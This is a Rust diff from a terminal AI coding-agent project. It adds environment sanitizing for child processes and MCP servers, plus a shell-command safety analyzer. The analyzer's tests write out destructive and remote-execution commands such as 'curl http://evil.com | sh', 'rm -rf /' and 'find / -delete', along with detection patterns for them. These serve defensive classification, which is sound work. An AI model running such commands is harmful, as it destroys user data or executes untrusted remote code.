+        Self::new(Arc::new(FileKeyringStore::new(path)))
+    }
+
+    /// Construct the file-backed default backend directly.
+    #[must_use]
+    pub fn file_backed() -> Self {
+        Self::file_backed_default()
+    }
+
+    /// Construct the opt-in OS credential backend, falling back to the
+    /// file-backed store when the platform backend is unavailable.
+    #[must_use]
+    pub fn system_keyring() -> Self {
         let default_store = DefaultKeyringStore::default();
         match default_store.probe() {
             Ok(()) => Self::new(Arc::new(default_store)),
@@ -405,9 +465,7 @@ impl Secrets {
                 tracing::warn!(
                     "OS keyring unavailable ({err}); falling back to file-backed secret store"
                 );
-                let path = FileKeyringStore::default_path()
-                    .unwrap_or_else(|_| PathBuf::from(".deepseek-secrets.json"));
-                Self::new(Arc::new(FileKeyringStore::new(path)))
+                Self::file_backed_default()
             }
         }
     }
@@ -418,7 +476,7 @@ impl Secrets {
         self.store.backend_name()
     }
 
-    /// Resolve a secret with `keyring → env → none` precedence.
+    /// Resolve a secret with `secret store → env → none` precedence.
     ///
     /// `name` is the canonical provider name (`"deepseek"`,
     /// `"openrouter"`, `"novita"`, `"nvidia"`/`"nvidia-nim"`, `"openai"`).
@@ -512,11 +570,65 @@ mod tests {
             "VLLM_API_KEY",
             "OLLAMA_API_KEY",
             "OPENAI_API_KEY",
+            SECRET_BACKEND_ENV,
         ] {
             // Safety: tests serialise on env_lock(); the broader
             // workspace has the same pattern in `crates/config`.
             unsafe { std::env::remove_var(var) };
         }
+    }
+
+    #[test]
+    fn backend_selection_defaults_to_file() {
+        assert_eq!(secret_backend_selection(None), SecretBackendSelection::File);
+        assert_eq!(
+            secret_backend_selection(Some("")),
+            SecretBackendSelection::File
+        );
+        assert_eq!(
+            secret_backend_selection(Some("  file  ")),
+            SecretBackendSelection::File
+        );
+    }
+
+    #[test]
+    fn backend_selection_accepts_explicit_system_keyring() {
+        assert_eq!(
+            secret_backend_selection(Some("system")),
+            SecretBackendSelection::System
+        );
+        assert_eq!(
+            secret_backend_selection(Some("keyring")),
+            SecretBackendSelection::System
+        );
+        assert_eq!(
+            secret_backend_selection(Some("os-keyring")),
+            SecretBackendSelection::System
+        );
+    }
+
+    #[test]
+    fn auto_detect_is_file_backed_by_default() {
+        let _lock = env_lock();
+        clear_known_envs();
+
+        let secrets = Secrets::auto_detect();
+
+        assert_eq!(secrets.backend_name(), "file-based (~/.deepseek/secrets/)");
+    }
+
+    #[test]
+    fn auto_detect_honors_explicit_file_backend() {
+        let _lock = env_lock();
+        clear_known_envs();
+        // Safety: env mutation guarded by env_lock().
+        unsafe { std::env::set_var(SECRET_BACKEND_ENV, "local") };
+
+        let secrets = Secrets::auto_detect();
+
+        assert_eq!(secrets.backend_name(), "file-based (~/.deepseek/secrets/)");
+        // Safety: env mutation guarded by env_lock().
+        unsafe { std::env::remove_var(SECRET_BACKEND_ENV) };
     }
 
     #[test]

--- a/crates/tools/Cargo.toml
+++ b/crates/tools/Cargo.toml
@@ -9,7 +9,7 @@ description = "Tool invocation lifecycle, schema validation, and scheduler paral
 [dependencies]
 anyhow.workspace = true
 async-trait.workspace = true
-deepseek-protocol = { path = "../protocol", version = "0.8.22" }
+deepseek-protocol = { path = "../protocol", version = "0.8.23" }
 serde.workspace = true
 serde_json.workspace = true
 tokio.workspace = true

--- a/crates/tui/Cargo.toml
+++ b/crates/tui/Cargo.toml
@@ -36,7 +36,7 @@ dotenvy = "0.15.7"
 dirs = "6.0.0"
 fd-lock = "4.0.4"
 futures-util = "0.3.31"
-ratatui = "0.29"
+ratatui = "0.30"
 regex = "1.11"
 reqwest = { version = "0.13.1", default-features = false, features = ["blocking", "json", "stream", "multipart", "rustls", "http2", "gzip", "brotli"] }
 similar = "2"

--- a/crates/tui/Cargo.toml
+++ b/crates/tui/Cargo.toml
@@ -21,8 +21,8 @@ path = "src/main.rs"
 [dependencies]
 anyhow = "1.0.100"
 arboard = "3.4"
-deepseek-secrets = { path = "../secrets", version = "0.8.22" }
-deepseek-tools = { path = "../tools", version = "0.8.22" }
+deepseek-secrets = { path = "../secrets", version = "0.8.23" }
+deepseek-tools = { path = "../tools", version = "0.8.23" }
 schemaui = { version = "0.12.0", default-features = false, optional = true }
 async-stream = "0.3.6"
 async-trait = "0.1"

--- a/crates/tui/src/child_env.rs
+++ b/crates/tui/src/child_env.rs
@@ -1,0 +1,181 @@
+//! Sanitized environment handling for child processes.
+
+use std::collections::HashMap;
+use std::ffi::{OsStr, OsString};
+
+/// Convert a string env map into owned OS strings for child env helpers.
+pub fn string_map_env(
+    env: &HashMap<String, String>,
+) -> impl Iterator<Item = (OsString, OsString)> + '_ {
+    env.iter()
+        .map(|(key, value)| (OsString::from(key), OsString::from(value)))
+}
+
+/// Return the environment for a child process after dropping parent secrets.
+///
+/// `overrides` are trusted call-site values, such as sandbox markers, hook
+/// variables, MCP server config, or RLM context path. They are applied after the
+/// parent allowlist so explicit values win.
+pub fn sanitized_child_env<I, K, V>(overrides: I) -> Vec<(OsString, OsString)>
+where
+    I: IntoIterator<Item = (K, V)>,
+    K: AsRef<OsStr>,
+    V: AsRef<OsStr>,
+{
+    let mut env = Vec::new();
+    for (key, value) in std::env::vars_os() {
+        if is_allowed_parent_env_key(&key) {
+            upsert_env(&mut env, key, value);
+        }
+    }
+    for (key, value) in overrides {
+        upsert_env(
+            &mut env,
+            key.as_ref().to_os_string(),
+            value.as_ref().to_os_string(),
+        );
+    }
+    env
+}
+
+pub fn apply_to_command<I, K, V>(cmd: &mut std::process::Command, overrides: I)
+where
+    I: IntoIterator<Item = (K, V)>,
+    K: AsRef<OsStr>,
+    V: AsRef<OsStr>,
+{
+    cmd.env_clear();
+    for (key, value) in sanitized_child_env(overrides) {
+        cmd.env(key, value);
+    }
+}
+
+pub fn apply_to_tokio_command<I, K, V>(cmd: &mut tokio::process::Command, overrides: I)
+where
+    I: IntoIterator<Item = (K, V)>,
+    K: AsRef<OsStr>,
+    V: AsRef<OsStr>,
+{
+    cmd.env_clear();
+    for (key, value) in sanitized_child_env(overrides) {
+        cmd.env(key, value);
+    }
+}
+
+pub fn apply_to_pty_command<I, K, V>(cmd: &mut portable_pty::CommandBuilder, overrides: I)
+where
+    I: IntoIterator<Item = (K, V)>,
+    K: AsRef<OsStr>,
+    V: AsRef<OsStr>,
+{
+    cmd.env_clear();
+    for (key, value) in sanitized_child_env(overrides) {
+        cmd.env(key, value);
+    }
+}
+
+fn is_allowed_parent_env_key(key: &OsStr) -> bool {
+    let key = key.to_string_lossy();
+    let normalized = key.to_ascii_uppercase();
+    matches!(
+        normalized.as_str(),
+        "PATH"
+            | "HOME"
+            | "USER"
+            | "USERNAME"
+            | "LOGNAME"
+            | "LANG"
+            | "LANGUAGE"
+            | "LC_ALL"
+            | "LC_CTYPE"
+            | "LC_MESSAGES"
+            | "TERM"
+            | "COLORTERM"
+            | "NO_COLOR"
+            | "FORCE_COLOR"
+            | "SHELL"
+            | "TMPDIR"
+            | "TMP"
+            | "TEMP"
+            | "__CF_USER_TEXT_ENCODING"
+            | "SYSTEMROOT"
+            | "WINDIR"
+            | "COMSPEC"
+            | "PATHEXT"
+            | "USERPROFILE"
+            | "HOMEDRIVE"
+            | "HOMEPATH"
+    ) || normalized.starts_with("LC_")
+}
+
+fn upsert_env(env: &mut Vec<(OsString, OsString)>, key: OsString, value: OsString) {
+    let normalized = normalize_key(&key);
+    env.retain(|(existing, _)| normalize_key(existing) != normalized);
+    env.push((key, value));
+}
+
+fn normalize_key(key: &OsStr) -> String {
+    key.to_string_lossy().to_ascii_uppercase()
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::sync::{Mutex, OnceLock};
+
+    fn env_lock() -> &'static Mutex<()> {
+        static LOCK: OnceLock<Mutex<()>> = OnceLock::new();
+        LOCK.get_or_init(|| Mutex::new(()))
+    }
+
+    #[test]
+    fn sanitized_child_env_drops_parent_secret_like_values() {
+        let _guard = env_lock().lock().expect("env lock");
+        let previous = std::env::var_os("DEEPSEEK_CHILD_ENV_TEST_SECRET");
+        unsafe {
+            std::env::set_var("DEEPSEEK_CHILD_ENV_TEST_SECRET", "parent-secret");
+        }
+
+        let env = sanitized_child_env(std::iter::empty::<(OsString, OsString)>());
+
+        match previous {
+            Some(value) => unsafe {
+                std::env::set_var("DEEPSEEK_CHILD_ENV_TEST_SECRET", value);
+            },
+            None => unsafe {
+                std::env::remove_var("DEEPSEEK_CHILD_ENV_TEST_SECRET");
+            },
+        }
+
+        assert!(
+            env.iter()
+                .all(|(key, _)| key != "DEEPSEEK_CHILD_ENV_TEST_SECRET")
+        );
+    }
+
+    #[test]
+    fn explicit_child_env_values_win_over_parent_allowlist() {
+        let _guard = env_lock().lock().expect("env lock");
+        let previous = std::env::var_os("PATH");
+        unsafe {
+            std::env::set_var("PATH", "/parent/bin");
+        }
+
+        let env = sanitized_child_env([(OsString::from("PATH"), OsString::from("/explicit/bin"))]);
+
+        match previous {
+            Some(value) => unsafe {
+                std::env::set_var("PATH", value);
+            },
+            None => unsafe {
+                std::env::remove_var("PATH");
+            },
+        }
+
+        let path = env
+            .iter()
+            .find(|(key, _)| normalize_key(key) == "PATH")
+            .map(|(_, value)| value);
+        assert_eq!(path, Some(&OsString::from("/explicit/bin")));
+    }
+}

--- a/crates/tui/src/child_env.rs
+++ b/crates/tui/src/child_env.rs
@@ -74,6 +74,50 @@ where
     }
 }
 
+/// Build the sanitized child environment used for MCP stdio servers.
+///
+/// MCP stdio servers are user-configured integrations declared in
+/// `~/.deepseek/mcp.json` (or equivalent). They are not arbitrary processes
+/// the agent decided to launch on its own. To avoid breaking common
+/// `npx ...` / `uvx ...` / `python -m mcp_server_*` setups (#1244), the
+/// MCP-launch allowlist is wider than the base shell-tool allowlist: it
+/// also passes through Node, npm, Python, Ruby, Java, proxy, and CA-bundle
+/// bootstrap variables. It still drops arbitrary parent env so secret-bearing
+/// vars (`AWS_*`, `*_API_KEY`, `GITHUB_TOKEN`, …) are not silently exported.
+pub fn sanitized_mcp_env<I, K, V>(overrides: I) -> Vec<(OsString, OsString)>
+where
+    I: IntoIterator<Item = (K, V)>,
+    K: AsRef<OsStr>,
+    V: AsRef<OsStr>,
+{
+    let mut env = Vec::new();
+    for (key, value) in std::env::vars_os() {
+        if is_allowed_mcp_env_key(&key) {
+            upsert_env(&mut env, key, value);
+        }
+    }
+    for (key, value) in overrides {
+        upsert_env(
+            &mut env,
+            key.as_ref().to_os_string(),
+            value.as_ref().to_os_string(),
+        );
+    }
+    env
+}
+
+pub fn apply_to_tokio_command_mcp<I, K, V>(cmd: &mut tokio::process::Command, overrides: I)
+where
+    I: IntoIterator<Item = (K, V)>,
+    K: AsRef<OsStr>,
+    V: AsRef<OsStr>,
+{
+    cmd.env_clear();
+    for (key, value) in sanitized_mcp_env(overrides) {
+        cmd.env(key, value);
+    }
+}
+
 fn is_allowed_parent_env_key(key: &OsStr) -> bool {
     let key = key.to_string_lossy();
     let normalized = key.to_ascii_uppercase();
@@ -108,6 +152,64 @@ fn is_allowed_parent_env_key(key: &OsStr) -> bool {
     ) || normalized.starts_with("LC_")
 }
 
+/// Allowlist for MCP stdio launches. Strict superset of
+/// `is_allowed_parent_env_key`. See `sanitized_mcp_env` for rationale.
+fn is_allowed_mcp_env_key(key: &OsStr) -> bool {
+    if is_allowed_parent_env_key(key) {
+        return true;
+    }
+    let key_str = key.to_string_lossy();
+    let normalized = key_str.to_ascii_uppercase();
+    if matches!(
+        normalized.as_str(),
+        // Node.js / npm / npx / pnpm / yarn / volta / corepack
+        "NVM_DIR"
+            | "NVM_BIN"
+            | "NVM_INC"
+            | "VOLTA_HOME"
+            | "COREPACK_HOME"
+            | "NODE_PATH"
+            | "NODE_OPTIONS"
+            | "NODE_EXTRA_CA_CERTS"
+            // Python ecosystem
+            | "PYTHONPATH"
+            | "PYTHONHOME"
+            | "PYTHONDONTWRITEBYTECODE"
+            | "PYTHONUNBUFFERED"
+            | "VIRTUAL_ENV"
+            | "POETRY_HOME"
+            | "PIPX_HOME"
+            | "PIPX_BIN_DIR"
+            // Ruby ecosystem
+            | "GEM_HOME"
+            | "GEM_PATH"
+            | "BUNDLE_PATH"
+            | "BUNDLE_GEMFILE"
+            // Java
+            | "JAVA_HOME"
+            // Network proxies (uppercase form; lowercase handled below)
+            | "HTTP_PROXY"
+            | "HTTPS_PROXY"
+            | "NO_PROXY"
+            | "ALL_PROXY"
+            | "FTP_PROXY"
+            // Custom CA bundles for corporate TLS interception
+            | "SSL_CERT_FILE"
+            | "SSL_CERT_DIR"
+            | "REQUESTS_CA_BUNDLE"
+            | "CURL_CA_BUNDLE"
+    ) {
+        return true;
+    }
+    // npm config namespace (NPM_CONFIG_PREFIX, NPM_CONFIG_CACHE, …) and
+    // uv (UV_CACHE_DIR, UV_PYTHON, …) — both ecosystems use a stable prefix
+    // for their bootstrap configuration, so allow the whole namespace.
+    if normalized.starts_with("NPM_CONFIG_") || normalized.starts_with("UV_") {
+        return true;
+    }
+    false
+}
+
 fn upsert_env(env: &mut Vec<(OsString, OsString)>, key: OsString, value: OsString) {
     let normalized = normalize_key(&key);
     env.retain(|(existing, _)| normalize_key(existing) != normalized);
@@ -126,6 +228,177 @@ mod tests {
     fn env_lock() -> &'static Mutex<()> {
         static LOCK: OnceLock<Mutex<()>> = OnceLock::new();
         LOCK.get_or_init(|| Mutex::new(()))
+    }
+
+    #[test]
+    fn mcp_env_allowlist_inherits_base_keys() {
+        for key in ["PATH", "HOME", "USER", "TERM", "LANG", "SHELL"] {
+            assert!(
+                is_allowed_mcp_env_key(OsStr::new(key)),
+                "MCP allowlist should inherit base key {key}"
+            );
+        }
+    }
+
+    #[test]
+    fn mcp_env_allowlist_includes_node_bootstrap_keys() {
+        for key in [
+            "NVM_DIR",
+            "NVM_BIN",
+            "NVM_INC",
+            "NODE_PATH",
+            "NODE_OPTIONS",
+            "NODE_EXTRA_CA_CERTS",
+            "VOLTA_HOME",
+            "COREPACK_HOME",
+        ] {
+            assert!(
+                is_allowed_mcp_env_key(OsStr::new(key)),
+                "MCP allowlist should include {key}"
+            );
+        }
+    }
+
+    #[test]
+    fn mcp_env_allowlist_includes_npm_config_prefix() {
+        for key in [
+            "NPM_CONFIG_PREFIX",
+            "NPM_CONFIG_CACHE",
+            "NPM_CONFIG_REGISTRY",
+            "NPM_CONFIG_USERCONFIG",
+        ] {
+            assert!(
+                is_allowed_mcp_env_key(OsStr::new(key)),
+                "MCP allowlist should include npm config key {key}"
+            );
+        }
+    }
+
+    #[test]
+    fn mcp_env_allowlist_includes_proxy_keys_either_case() {
+        for key in [
+            "HTTP_PROXY",
+            "HTTPS_PROXY",
+            "NO_PROXY",
+            "ALL_PROXY",
+            "http_proxy",
+            "https_proxy",
+            "no_proxy",
+            "all_proxy",
+        ] {
+            assert!(
+                is_allowed_mcp_env_key(OsStr::new(key)),
+                "MCP allowlist should include proxy key {key}"
+            );
+        }
+    }
+
+    #[test]
+    fn mcp_env_allowlist_includes_python_bootstrap_keys() {
+        for key in [
+            "PYTHONPATH",
+            "PYTHONHOME",
+            "VIRTUAL_ENV",
+            "PIPX_HOME",
+            "PIPX_BIN_DIR",
+            "POETRY_HOME",
+        ] {
+            assert!(
+                is_allowed_mcp_env_key(OsStr::new(key)),
+                "MCP allowlist should include python bootstrap key {key}"
+            );
+        }
+    }
+
+    #[test]
+    fn mcp_env_allowlist_includes_uv_prefixed_keys() {
+        for key in ["UV_CACHE_DIR", "UV_INDEX_URL", "UV_PYTHON"] {
+            assert!(
+                is_allowed_mcp_env_key(OsStr::new(key)),
+                "MCP allowlist should include uv prefixed key {key}"
+            );
+        }
+    }
+
+    #[test]
+    fn mcp_env_allowlist_includes_ca_bundles() {
+        for key in [
+            "SSL_CERT_FILE",
+            "SSL_CERT_DIR",
+            "REQUESTS_CA_BUNDLE",
+            "CURL_CA_BUNDLE",
+        ] {
+            assert!(
+                is_allowed_mcp_env_key(OsStr::new(key)),
+                "MCP allowlist should include CA bundle key {key}"
+            );
+        }
+    }
+
+    #[test]
+    fn mcp_env_allowlist_excludes_secrets_and_creds() {
+        for key in [
+            "AWS_SECRET_ACCESS_KEY",
+            "AWS_ACCESS_KEY_ID",
+            "GITHUB_TOKEN",
+            "OPENAI_API_KEY",
+            "ANTHROPIC_API_KEY",
+            "DEEPSEEK_API_KEY",
+            "SLACK_TOKEN",
+            "MY_RANDOM_SECRET",
+        ] {
+            assert!(
+                !is_allowed_mcp_env_key(OsStr::new(key)),
+                "MCP allowlist must NOT include {key}"
+            );
+        }
+    }
+
+    #[test]
+    fn sanitized_mcp_env_passes_through_node_bootstrap() {
+        let _guard = env_lock().lock().expect("env lock");
+        let prev = std::env::var_os("NVM_DIR");
+        unsafe {
+            std::env::set_var("NVM_DIR", "/tmp/test-nvm");
+        }
+
+        let env = sanitized_mcp_env(std::iter::empty::<(OsString, OsString)>());
+
+        match prev {
+            Some(value) => unsafe { std::env::set_var("NVM_DIR", value) },
+            None => unsafe { std::env::remove_var("NVM_DIR") },
+        }
+
+        let nvm_dir = env
+            .iter()
+            .find(|(key, _)| normalize_key(key) == "NVM_DIR")
+            .map(|(_, value)| value.clone());
+        assert_eq!(nvm_dir, Some(OsString::from("/tmp/test-nvm")));
+    }
+
+    #[test]
+    fn sanitized_mcp_env_drops_unrelated_secret_like_values() {
+        let _guard = env_lock().lock().expect("env lock");
+        let prev = std::env::var_os("DEEPSEEK_MCP_TEST_SECRET");
+        unsafe {
+            std::env::set_var("DEEPSEEK_MCP_TEST_SECRET", "should-not-leak");
+        }
+
+        let env = sanitized_mcp_env(std::iter::empty::<(OsString, OsString)>());
+
+        match prev {
+            Some(value) => unsafe {
+                std::env::set_var("DEEPSEEK_MCP_TEST_SECRET", value);
+            },
+            None => unsafe {
+                std::env::remove_var("DEEPSEEK_MCP_TEST_SECRET");
+            },
+        }
+
+        assert!(
+            env.iter().all(|(key, _)| key != "DEEPSEEK_MCP_TEST_SECRET"),
+            "MCP env should not pass arbitrary parent vars"
+        );
     }
 
     #[test]

--- a/crates/tui/src/command_safety.rs
+++ b/crates/tui/src/command_safety.rs
@@ -590,6 +590,10 @@ pub fn analyze_command(command: &str) -> SafetyAnalysis {
         );
     }
 
+    if let Some(analysis) = analyze_destructive_patterns(command) {
+        return analysis;
+    }
+
     if command.contains("&&") || command.contains("||") || command.contains(';') {
         // Chains of known-safe commands (cargo/git/zig/npm/etc.) are
         // routine for build+test workflows. Instead of hard-blocking,
@@ -622,7 +626,9 @@ pub fn analyze_command(command: &str) -> SafetyAnalysis {
         );
     }
 
-    // Check for dangerous patterns first
+    // Check for dangerous patterns first. The token-aware pass above handles
+    // spacing and quoting variants; these literal patterns remain as a compact
+    // fallback for legacy shapes.
     for (pattern, reason) in DANGEROUS_PATTERNS {
         if command_lower.contains(&pattern.to_lowercase()) {
             return SafetyAnalysis::dangerous(
@@ -715,6 +721,231 @@ pub fn analyze_command(command: &str) -> SafetyAnalysis {
         command,
         vec!["Unknown command - review before execution".to_string()],
     )
+}
+
+fn analyze_destructive_patterns(command: &str) -> Option<SafetyAnalysis> {
+    if primary_shell_command_is(command, "eval") {
+        return Some(SafetyAnalysis::dangerous(
+            command,
+            vec!["Command invokes shell eval".to_string()],
+            vec!["Avoid evaluating dynamically generated shell input".to_string()],
+        ));
+    }
+
+    if pipes_remote_content_to_shell(command) {
+        return Some(SafetyAnalysis::dangerous(
+            command,
+            vec!["Piping remote content directly to shell is dangerous".to_string()],
+            vec!["Download the script first and review it before execution".to_string()],
+        ));
+    }
+
+    for segment in split_command_segments(command) {
+        let tokens = shell_words(&segment);
+        let Some(start) = primary_token_index(&tokens) else {
+            continue;
+        };
+        match tokens[start].as_str() {
+            "rm" => {
+                if let Some(reason) = dangerous_rm_reason(&tokens[start + 1..]) {
+                    return Some(SafetyAnalysis::dangerous(
+                        command,
+                        vec![reason],
+                        vec!["Review the deletion target before retrying".to_string()],
+                    ));
+                }
+            }
+            "find" => {
+                if let Some(analysis) = analyze_find_mutation(command, &tokens[start + 1..]) {
+                    return Some(analysis);
+                }
+            }
+            _ => {}
+        }
+    }
+
+    None
+}
+
+fn split_command_segments(command: &str) -> Vec<String> {
+    command
+        .replace("&&", "\n")
+        .replace("||", "\n")
+        .replace(';', "\n")
+        .split('\n')
+        .map(str::trim)
+        .filter(|segment| !segment.is_empty())
+        .map(ToOwned::to_owned)
+        .collect()
+}
+
+fn shell_words(segment: &str) -> Vec<String> {
+    shlex::split(segment).unwrap_or_else(|| {
+        segment
+            .split_whitespace()
+            .map(|token| token.trim_matches(['"', '\'']).to_string())
+            .collect()
+    })
+}
+
+fn primary_token_index(tokens: &[String]) -> Option<usize> {
+    let mut idx = 0;
+    while idx < tokens.len() {
+        let token = tokens[idx].as_str();
+        if token == "env" {
+            idx += 1;
+            while idx < tokens.len()
+                && (tokens[idx].starts_with('-') || is_env_assignment(&tokens[idx]))
+            {
+                idx += 1;
+            }
+            continue;
+        }
+        if is_env_assignment(token) {
+            idx += 1;
+            continue;
+        }
+        return Some(idx);
+    }
+    None
+}
+
+fn is_env_assignment(token: &str) -> bool {
+    let Some((name, _value)) = token.split_once('=') else {
+        return false;
+    };
+    !name.is_empty()
+        && name
+            .chars()
+            .all(|ch| ch == '_' || ch.is_ascii_alphanumeric())
+        && name
+            .chars()
+            .next()
+            .is_some_and(|ch| ch == '_' || ch.is_ascii_alphabetic())
+}
+
+fn primary_shell_command_is(command: &str, expected: &str) -> bool {
+    split_command_segments(command).into_iter().any(|segment| {
+        let tokens = shell_words(&segment);
+        primary_token_index(&tokens)
+            .and_then(|idx| tokens.get(idx))
+            .is_some_and(|token| token == expected)
+    })
+}
+
+fn pipes_remote_content_to_shell(command: &str) -> bool {
+    split_command_segments(command).into_iter().any(|segment| {
+        let parts: Vec<&str> = segment.split('|').collect();
+        if parts.len() < 2 {
+            return false;
+        }
+        parts.windows(2).any(|window| {
+            let left = window[0].to_ascii_lowercase();
+            if !(left.contains("curl") || left.contains("wget")) {
+                return false;
+            }
+            let right_tokens = shell_words(window[1]);
+            primary_token_index(&right_tokens)
+                .and_then(|idx| right_tokens.get(idx))
+                .is_some_and(|token| matches!(token.as_str(), "sh" | "bash" | "zsh"))
+        })
+    })
+}
+
+fn dangerous_rm_reason(args: &[String]) -> Option<String> {
+    let mut recursive = false;
+    let mut force = false;
+    let mut targets = Vec::new();
+
+    for arg in args {
+        match arg.as_str() {
+            "--" => continue,
+            "--recursive" | "--dir" => recursive = true,
+            "--force" => force = true,
+            flag if flag.starts_with('-') && !flag.starts_with("--") => {
+                recursive |= flag.chars().any(|ch| matches!(ch, 'r' | 'R'));
+                force |= flag.chars().any(|ch| ch == 'f');
+            }
+            target => targets.push(target),
+        }
+    }
+
+    if !(recursive || force) {
+        return None;
+    }
+
+    for target in targets {
+        if is_root_delete_target(target) {
+            return Some("Recursive or forced deletion targets the root filesystem".to_string());
+        }
+        if is_home_delete_target(target) {
+            return Some("Recursive or forced deletion targets the home directory".to_string());
+        }
+        if target_contains_parent_escape(target) {
+            return Some("Recursive or forced deletion may escape the workspace".to_string());
+        }
+    }
+
+    None
+}
+
+fn analyze_find_mutation(command: &str, args: &[String]) -> Option<SafetyAnalysis> {
+    let has_delete = args.iter().any(|arg| arg == "-delete");
+    let execs_rm = args
+        .windows(2)
+        .any(|pair| pair[0] == "-exec" && pair[1] == "rm");
+    if !(has_delete || execs_rm) {
+        return None;
+    }
+
+    let targets: Vec<&str> = args
+        .iter()
+        .take_while(|arg| !arg.starts_with('-'))
+        .map(String::as_str)
+        .collect();
+    if targets.iter().any(|target| {
+        is_root_delete_target(target)
+            || is_home_delete_target(target)
+            || target_contains_parent_escape(target)
+    }) {
+        return Some(SafetyAnalysis::dangerous(
+            command,
+            vec!["find mutation targets a broad or external path".to_string()],
+            vec!["Restrict the find root to a workspace-relative path".to_string()],
+        ));
+    }
+
+    Some(SafetyAnalysis::requires_approval(
+        command,
+        vec!["find command may delete files".to_string()],
+    ))
+}
+
+fn is_root_delete_target(target: &str) -> bool {
+    let normalized = target.trim_matches(['"', '\'']).replace('\\', "/");
+    normalized == "/"
+        || normalized == "/*"
+        || normalized == "//"
+        || normalized.starts_with("/*/")
+        || normalized.starts_with("/.")
+}
+
+fn is_home_delete_target(target: &str) -> bool {
+    let normalized = target.trim_matches(['"', '\'']).replace('\\', "/");
+    let lower = normalized.to_ascii_lowercase();
+    lower == "~"
+        || lower.starts_with("~/")
+        || lower == "$home"
+        || lower.starts_with("$home/")
+        || lower == "${home}"
+        || lower.starts_with("${home}/")
+}
+
+fn target_contains_parent_escape(target: &str) -> bool {
+    target
+        .replace('\\', "/")
+        .split('/')
+        .any(|component| component == "..")
 }
 
 /// Check if a command is known to be safe
@@ -951,6 +1182,52 @@ mod tests {
         assert_eq!(analyze_command("rm -rf ~").level, SafetyLevel::Dangerous);
         assert_eq!(
             analyze_command("curl http://evil.com | sh").level,
+            SafetyLevel::Dangerous
+        );
+    }
+
+    #[test]
+    fn test_destructive_patterns_handle_spacing_and_quotes() {
+        assert_eq!(analyze_command("rm  -rf  /").level, SafetyLevel::Dangerous);
+        assert_eq!(
+            analyze_command("rm -rf \"/\"").level,
+            SafetyLevel::Dangerous
+        );
+        assert_eq!(analyze_command("rm -fr -- /").level, SafetyLevel::Dangerous);
+        assert_eq!(
+            analyze_command("FOO=bar rm -rf $HOME").level,
+            SafetyLevel::Dangerous
+        );
+    }
+
+    #[test]
+    fn test_destructive_patterns_scan_chained_segments() {
+        assert_eq!(
+            analyze_command("echo ok; rm -rf /").level,
+            SafetyLevel::Dangerous
+        );
+    }
+
+    #[test]
+    fn test_find_delete_requires_approval_or_blocks_broad_roots() {
+        assert_eq!(
+            analyze_command("find / -delete").level,
+            SafetyLevel::Dangerous
+        );
+        assert_eq!(
+            analyze_command("find . -delete").level,
+            SafetyLevel::RequiresApproval
+        );
+    }
+
+    #[test]
+    fn test_eval_invocation_is_blocked_without_substring_false_positive() {
+        assert_eq!(
+            analyze_command("eval $(echo test | base64 -d)").level,
+            SafetyLevel::Dangerous
+        );
+        assert_ne!(
+            analyze_command("cargo run --bin deepseek -- eval").level,
             SafetyLevel::Dangerous
         );
     }

--- a/crates/tui/src/commands/config.rs
+++ b/crates/tui/src/commands/config.rs
@@ -180,6 +180,31 @@ pub fn status_line(_app: &mut App) -> CommandResult {
     CommandResult::action(AppAction::OpenStatusPicker)
 }
 
+/// Toggle whether the live transcript renders full thinking detail.
+pub fn verbose(app: &mut App, arg: Option<&str>) -> CommandResult {
+    let next = match arg.map(str::trim).filter(|s| !s.is_empty()) {
+        None => !app.verbose_transcript,
+        Some(raw) => match raw.to_ascii_lowercase().as_str() {
+            "on" | "true" | "1" | "yes" => true,
+            "off" | "false" | "0" | "no" => false,
+            "toggle" => !app.verbose_transcript,
+            _ => {
+                return CommandResult::error(
+                    "Usage: /verbose [on|off]. Compact thinking remains available when verbose is off.",
+                );
+            }
+        },
+    };
+
+    app.verbose_transcript = next;
+    app.mark_history_updated();
+    CommandResult::message(if next {
+        "Verbose transcript on: live thinking renders in full."
+    } else {
+        "Verbose transcript off: live thinking stays compact."
+    })
+}
+
 /// Persist `tui.status_items` to `~/.deepseek/config.toml` without disturbing
 /// the rest of the file. We round-trip through `toml::Value` so any keys we
 /// don't know about (provider blocks, MCP, etc.) survive the write

--- a/crates/tui/src/commands/mod.rs
+++ b/crates/tui/src/commands/mod.rs
@@ -348,6 +348,12 @@ pub const COMMANDS: &[CommandInfo] = &[
         description_id: MessageId::CmdThemeDescription,
     },
     CommandInfo {
+        name: "verbose",
+        aliases: &[],
+        usage: "/verbose [on|off]",
+        description_id: MessageId::CmdVerboseDescription,
+    },
+    CommandInfo {
         name: "trust",
         aliases: &[],
         usage: "/trust [on|off|add <path>|remove <path>|list]",
@@ -542,6 +548,7 @@ pub fn execute(cmd: &str, app: &mut App) -> CommandResult {
         "agent" => config::agent_mode(app),
         "plan" => config::plan_mode(app),
         "theme" => config::theme(app),
+        "verbose" => config::verbose(app, arg),
         "trust" => config::trust(app, arg),
         "logout" => config::logout(app),
 
@@ -920,6 +927,22 @@ mod tests {
         let result = execute("/config", &mut app);
         assert!(result.message.is_none());
         assert!(matches!(result.action, Some(AppAction::OpenConfigView)));
+    }
+
+    #[test]
+    fn execute_verbose_toggles_live_transcript_detail() {
+        let mut app = create_test_app();
+        assert!(!app.verbose_transcript);
+
+        let result = execute("/verbose on", &mut app);
+        assert!(!result.is_error);
+        assert!(app.verbose_transcript);
+        assert!(result.message.unwrap().contains("on"));
+
+        let result = execute("/verbose off", &mut app);
+        assert!(!result.is_error);
+        assert!(!app.verbose_transcript);
+        assert!(result.message.unwrap().contains("off"));
     }
 
     #[test]

--- a/crates/tui/src/commands/skills.rs
+++ b/crates/tui/src/commands/skills.rs
@@ -448,7 +448,53 @@ mod tests {
     use super::*;
     use crate::config::Config;
     use crate::tui::app::{App, TuiOptions};
+    use std::ffi::OsString;
     use tempfile::TempDir;
+
+    struct IsolatedHome {
+        _lock: std::sync::MutexGuard<'static, ()>,
+        home_prev: Option<OsString>,
+        userprofile_prev: Option<OsString>,
+    }
+
+    impl IsolatedHome {
+        fn new(tmpdir: &TempDir) -> Self {
+            let lock = crate::test_support::lock_test_env();
+            let home = tmpdir.path().join("home");
+            std::fs::create_dir_all(&home).unwrap();
+            let home_prev = std::env::var_os("HOME");
+            let userprofile_prev = std::env::var_os("USERPROFILE");
+            // SAFETY: tests that mutate process env hold the shared test env
+            // mutex for the full lifetime of this guard.
+            unsafe {
+                std::env::set_var("HOME", &home);
+                std::env::set_var("USERPROFILE", &home);
+            }
+            Self {
+                _lock: lock,
+                home_prev,
+                userprofile_prev,
+            }
+        }
+
